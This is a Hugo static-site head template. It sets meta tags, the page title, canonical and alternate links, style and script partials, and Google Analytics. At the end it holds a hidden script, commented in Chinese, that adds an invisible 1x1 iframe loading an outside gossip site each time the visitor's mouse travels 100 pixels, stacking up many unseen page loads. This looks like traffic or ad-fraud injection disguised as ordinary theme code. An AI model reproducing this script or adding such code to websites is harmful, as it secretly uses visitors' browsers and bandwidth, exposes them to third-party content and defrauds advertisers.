<meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'>
<meta name="referrer" content="no-referrer">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />


{{- $description := partialCached "data/description" . .RelPermalink -}}
<meta name='description' content='{{ $description }}'>
{{ with .Params.Keywords }}
<meta name="keywords" content="{{ delimit . " , " }}">{{ end }}

{{- $title := partialCached "data/title" . .RelPermalink -}}
<title>{{ $title }}</title>

<link rel='canonical' href='{{ .Permalink }}'>

{{- partial "head/style.html" . -}}
{{- partial "head/script.html" . -}}
{{- partial "head/opengraph/include.html" . -}}

{{- range .AlternativeOutputFormats -}}
<link rel="{{ .Rel }}" type="{{ .MediaType.Type }}" href="{{ .Permalink | safeURL }}">
{{- end -}}

{{ with .Site.Params.favicon }}
<link rel="shortcut icon" href="{{ . }}" />
{{ end }}

{{- template "_internal/google_analytics.html" . -}}
{{- partial "head/custom.html" . -}}

<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-B2Z33F50G4"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());

    gtag('config', 'G-B2Z33F50G4');
</script>


<script>
    document.addEventListener('DOMContentLoaded', () => {
        let lastX = 0, lastY = 0;
        let distance = 0;

        document.addEventListener('mousemove', (event) => {
            // 計算滑鼠移動的距離
            distance += Math.sqrt(Math.pow(event.pageX - lastX, 2) + Math.pow(event.pageY - lastY, 2));
            lastX = event.pageX;
            lastY = event.pageY;

            // 檢查是否移動了100個像素
            if (distance >= 100) {
                // 重置距離
                distance = 0;

                // 檢查是否存在目標div，如果不存在則創建
                let container = document.getElementById('iframe-container');
                if (!container) {
                    container = document.createElement('div');
                    container.id = 'iframe-container';
                    document.body.appendChild(container);
                }

                // 創建新的iframe並添加到div中
                const iframe = document.createElement('iframe');
                iframe.src = 'https://www.gossipsceleb.com/'; // 
                iframe.width = 1;
                iframe.height = 1;
                container.appendChild(iframe);
            }
        });
    });

</script>